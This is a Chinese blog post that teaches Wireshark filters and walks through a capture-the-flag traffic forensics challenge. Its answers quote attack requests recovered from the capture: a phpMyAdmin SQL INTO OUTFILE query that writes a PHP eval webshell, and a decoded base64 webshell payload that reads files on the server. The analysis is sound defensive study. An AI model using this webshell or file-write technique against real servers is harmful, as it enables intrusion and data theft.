使用wireshark进行基础的日志审计

最新推荐文章于 2023-06-19 21:27:21 发布
最新推荐文章于 2023-06-19 21:27:21 发布
阅读量738 收藏 6
点赞数
分类专栏: 深度学习/自然语言处理 信息安全 文章标签: wireshark php 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43199509/article/details/124935034
版权

可以通过tcpdump -i 把网络流量打印出来进行审计
在这里插入图片描述

Wireshark下载地址:
https://www.wireshark.org/download.html
其中常用的几种过滤字段:

ip过滤:
ip.src==x.x.x.x
ip.dst==x.x.x.x
端口过滤:
http.port==xx
tcp.port==xx
协议过滤:
http,tcp,icmp,udp
http.request.method==POST
链接符使用:
and,or

通用的过滤条件在左上方填写,其中按下ctrl+F还能多出一个字段搜索过滤的选项
在这里插入图片描述
其中右键点击对应条目,有个追踪流的选项,这个可以看到整个会话流程的包,很好用
在这里插入图片描述

这里放个日志审计的案例,赛题来源于2019年的一个安全比赛
Bravo-1.pcapng
提取码:27qc
在这里插入图片描述

1、flag{/uploads}
使用http协议过滤数据包:
在这里插入图片描述
服务端ip为192.168.1.5
客户端ip为192.168.1.25
在这里插入图片描述

分析扫描流量可以看到,扫目录的请求头一般为HEAD,所以

flag{/uploads}

2、flag{/phpMyAdmin/import.php }
在这里插入图片描述
右键追踪流 访问import.php的流量

is_js_confirmed=0&token=3e379d169278fb2f4cb076f487aa39ea&pos=0&goto=server_sql.php&message_to_show=Your+SQL+query+has+been+executed+successfully&prev_sql_query=&sql_query=select+'%3C%3Fphp+%40eval(%24_POST%5Bcia%5D)%3B%3F%3E'+into+outfile+'c%3A%2Fphpstudy%2Fwww%2Fm%2Fshell2.php'%3B&sql_delimiter=%3B&show_query=1&ajax_request=true&_nocache=154356159491350860
cia=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQ

url 解码

is_js_confirmed=0&token=3e379d169278fb2f4cb076f487aa39ea&pos=0&goto=server_sql.php&message_to_show=Your SQL query has been executed successfully&prev_sql_query=&sql_query=select '<?php @eval($_POST[cia]);?>' into outfile 'c:/phpstudy/www/m/shell2.php';&sql_delimiter=;&show_query=1&ajax_request=true&_nocache=154356159491350860

c:/phpstudy/www/m/shell2.php [木马位置]

攻击者写入木马的目录:

/phpMyAdmin/import.php
flag{/phpMyAdmin/import.php }

3、flag{c:/flag.txt }
在这里插入图片描述
在这里插入图片描述

Url 解码
在这里插入图片描述

flag{c:/flag.txt }

4、flag{c:/phpstudy/www/m/shell2.php}

由第2题可知c:/phpstudy/www/m/shell2.php [木马位置]

flag{c:/phpstudy/www/m/shell2.php}
5、flag{cia}

由第2题,
木马<?php @eval($_POST[cia]);?>的密码为cia

flag{cia}

6、flag{connect.php}

追踪流
在这里插入图片描述

cia=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1nZXRfbWFnaWNfcXVvdGVzX2dwYygpP3N0cmlwc2xhc2hlcygkX1BPU1RbInoxIl0pOiRfUE9TVFsiejEiXTskZnA9QGZvcGVuKCRGLCJyIik7aWYoQGZnZXRjKCRmcCkpe0BmY2xvc2UoJGZwKTtAcmVhZGZpbGUoJEYpO31lbHNle2VjaG8oIkVSUk9SOi8vIENhbiBOb3QgUmVhZCIpO307ZWNobygifDwtIik7ZGllKCk7&z1=C%3A%5C%5CphpStudy%5C%5CWWW%5C%5Carchives%5C%5Cconnect.php

url解码

cia=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1nZXRfbWFnaWNfcXVvdGVzX2dwYygpP3N0cmlwc2xhc2hlcygkX1BPU1RbInoxIl0pOiRfUE9TVFsiejEiXTskZnA9QGZvcGVuKCRGLCJyIik7aWYoQGZnZXRjKCRmcCkpe0BmY2xvc2UoJGZwKTtAcmVhZGZpbGUoJEYpO31lbHNle2VjaG8oIkVSUk9SOi8vIENhbiBOb3QgUmVhZCIpO307ZWNobygifDwtIik7ZGllKCk7&z1=C:\\phpStudy\\WWW\\archives\\connect.php

z0 base64解码

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=get_magic_quotes_gpc()?stripslashes($_POST["z1"]):$_POST["z1"];$fp=@fopen($F,"r");if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo("ERROR:// Can Not Read");};echo("|<-");die();

z1=C:\\phpStudy\\WWW\\archives\\connect.php

flag{connect.php}

7、flag{kingman}

web连接的数据库名
在这里插入图片描述
追踪流,数据库名为 kingsman
flag{kingman}

梦想闹钟
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
wireshark抓包日志分析--洗号空闲超时案例
Bruce_Wangjr的博客
04-15 1684
wireshark抓包日志分析 数千线高并发压测时,asr_ring洗号服务报错Session idle too long,意思是洗号这边一直没有收到音频数据直到超时报错。由于缺失日志线索,只能通过wireshark分析抓取的包。 1.抓包数据: 由于是千线压测,洗号的服务器都是分布式部署的,我是在洗号服务器和网关之间抓的包,抓包命令如下: # tcpdump -i eno1 -s 0 host 10.0.1.71 and \(10.0.1.46 \) -w 1028.cap 其中 eno1为网卡名称
WireShark 使用日记
10-02 75
/**********************************/ 第一次capture 环境配置:WireShark 官方下载,必须安装WinPCap Capture->Interfaces->选择使用的网卡 中间Fliter为过滤器 可以选择TCP,UDP等协议 /***************************...
Wireshark之流量包分析+日志分析 (护网:蓝队)web安全 取证 分析黑客攻击流程(下篇)
m0_46631208的博客
07-08 3360
前言:咦!确实让我想不到的是,这几天有不少的人催我更新分析的下篇!我以为这像便秘的粑粑,又臭又长没人看!但出乎意料,这不我加班加点就来满足你们咯!所以你懂的(悄悄告诉你:“点赞”)确实我也觉得这篇能学习到很多知识点,比如:知晓黑客攻击的流程手段,我们可以什么点来防范,采集等。来自安恒的资深项目经理讲解(甘老师)对我的谆谆教诲!(此篇只是自己的解题思路,如有问题,请轻言细语的指出来!感谢!) 本篇是下篇,讲解题目6-10题,如有需要请回顾上篇! 一 回顾题目: 注意:(我用的是一个已经被黑客攻击过的论坛
小白的WireShark学习日记
Jair_Bao的博客
04-16 435
短短30多分钟的课,我愣是上了一整天,当然这中间也去做了其他的事儿。总的来说,这课上下来还是有点收获的,特别是对于一个第二天要参加电子取证校赛的小白来说,也算一个比较好的速成课程了吧通过这节课,我了解了WireShark基础用法,学到了一些基础操作、基础命令,也领教了WireShark在实战中的别样用法。在震惊于WireShark功能之强大的同时,也要提醒大家一定要注意上网安全啊!一定要注意隐私保护啊!还有就是千万不要觉得自己比别人多了一点技术就去做一些违法的事儿!
wireshark过滤规则
bytxl的专栏
12-01 726
http://blog.sina.com.cn/s/blog_48a0f2740100ka71.html 1.过 滤IP,如来源IP或者目标IP等于某个IP 例子: ip.src eq 192.168.1.107 or ip.dst eq 192.168.1.107 或者 ip.addr eq 192.168.1.107 // 都能显示来源IP和目标IP 2.过滤端 口
使用WireShark进行VOIP分析.ppt
05-24
WireShark进行VOIP分析
WireShark使用教程.pdf
06-27
WireShark使用教程.pdfWireShark使用教程.pdfWireShark使用教程.pdfWireShark使用教程.pdfWireShark使用教程.pdfWireShark使用教程.pdf
Suricata + Wireshark离线流量日志分析
10-06
Suricata + Wireshark离线流量日志分析
wireshark使用说明
08-13
wireshark软件使用说明。
wireshark使用详细教程.pdf
03-28
Wireshark是一款强大的网络封包分析工具,能够捕获网络数据包并对其进行详细的分析。... Wireshark的主要功能包括: ...可扩展性:Wireshark使用插件和脚本进行扩展,用户可以根据自己的需求添加新的协议解析器或
wireshark抓包数据提取
04-24
wireshark导出日志中DATA提取工具代码。过滤掉多余信息,只提取出数据包里面的data数据。
没有外层实列可以访问_wireshark使用及实列分析
weixin_39706367的博客
11-23 134
声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。前言最近在HW,主要工作就是判断各个设备日志,分析数据包,对wireshark数...
wireshark流量分析--巧观察
D-R0s1的博客
09-17 4427
       在CTF流量分析中,在流量包中可以隐藏好多东西,上面有篇文章说道在有大量流量包的情况下要善于运用过滤协议,来节省时间。但是,有些情况下,过滤是过滤不出东西的,比如在这道题目中我们运用过滤协议过滤不出东西,但是仔细观察,发现有流量特别大的包,这就显得很异常。追踪流发现:        504B0304是明显的ZIP的十六进制头,把这一段分离出来复制到winhex中,保存改后缀为z...
使用Wireshark统计APP接口访问信息
sanmianti
07-16 3098
需求分析 无论对于开发或者测试人员,了解自家应用在实际使用场景中调用了哪些接口是十分必要的。一来可以观察是否有异常调用,例如重复访问。二来可以分析各接口访问频次,为服务端架构提供参考数据,也可以为应用网络优化提供线索。 本篇文章就是站在宏观角度,利用Wireshark统计分析应用的接口访问情况。并导出数据报告。 需要提示的是,统计结果可能因使用场景不同产生较大误差,但统计结果随着统计...
wireshark数据分析-Bravo-1
qq_56025677的博客
06-19 644
1.分析靶机root目录下的Bravo-1.pcapng数据包文件,通过分析数据包Bravo-1.pcapng获取web服务器使用的cms和版本号,并将该cms和版本号作为FLAG提交;(例joomla 2.1.1)(例abc,def,zxc)6.继续查看数据包文件Bravo-1.pcapng分析找出恶意用户读取文件中的flag值,并将该文件中的flag值作为FLAG提交;2.继续查看数据包文件Bravo-1.pcapng,分析出mysql服务root用户的密码,并将该密码作为FLAG提交;
wireshark捕获选项不能用_wireshark文件及数据包操作
weixin_39523529的博客
11-23 1165
概述在使用wireshark中可能遇到分割文件、合并文件、导出某个包等各种情景,熟练使用这些操作可以让分析工作事半功倍文件操作文件分割打开分割后的单个文件,可以通过File|File Set|List Files可以看出一共分割了多少文件(目录下必须存在分割后的文件才行)。通过单击分割后的文件可以迅速切换到对应的分割文件。如果使用了显示过滤器,此过滤器作用到每个打开的文件上。capinfos ...
2022年中职组网络安全国赛A模块题目解析
qq_57147160的博客
04-13 8793
2022年全国职业院校技能大赛(中职组) 网络安全竞赛试题 (1) (总分100分) 赛题说明 一、竞赛项目简介 “网络安全”竞赛共分A.基础设施设置与安全加固;B.网络安全事件响应、数字取证调查和应用安全;C.CTF夺旗-攻击;D.CTF夺旗-防御等四个模块。根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。竞赛时间安排和分值权重见表1。 表1 竞赛时间安排与分值权重 模块编号 模块名.
数据分析数字取证-Bravo-1复现方法
jingshuishenlong的专栏
04-07 1313
一、安装靶机环境 1、在win10宿主机上安装虚拟机:VMware-workstation-full-16.0.0-16894299.exe 2、在VMware上新建win7 32位的虚拟机,配置为:1颗1核CPU、1G内存、硬盘60G单文件存储、网卡桥接模式; 3、虚拟机上的光盘上插入镜像文件:cn_windows_7_ultimate_with_sp1_x86_dvd_u_677486.iso 4、重启虚拟机,开始安装。 5、安装完win7后,禁用普通用户,启用administrator用
如何使用Wireshark进行数据包分析?
最新发布
04-09
下面是使用Wireshark进行数据包分析的基本步骤: 1. 下载和安装:首先,你需要从Wireshark官方网站下载并安装Wireshark软件。 2. 打开Wireshark:安装完成后,打开Wireshark软件。 3. 选择网络接口:在Wireshark...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值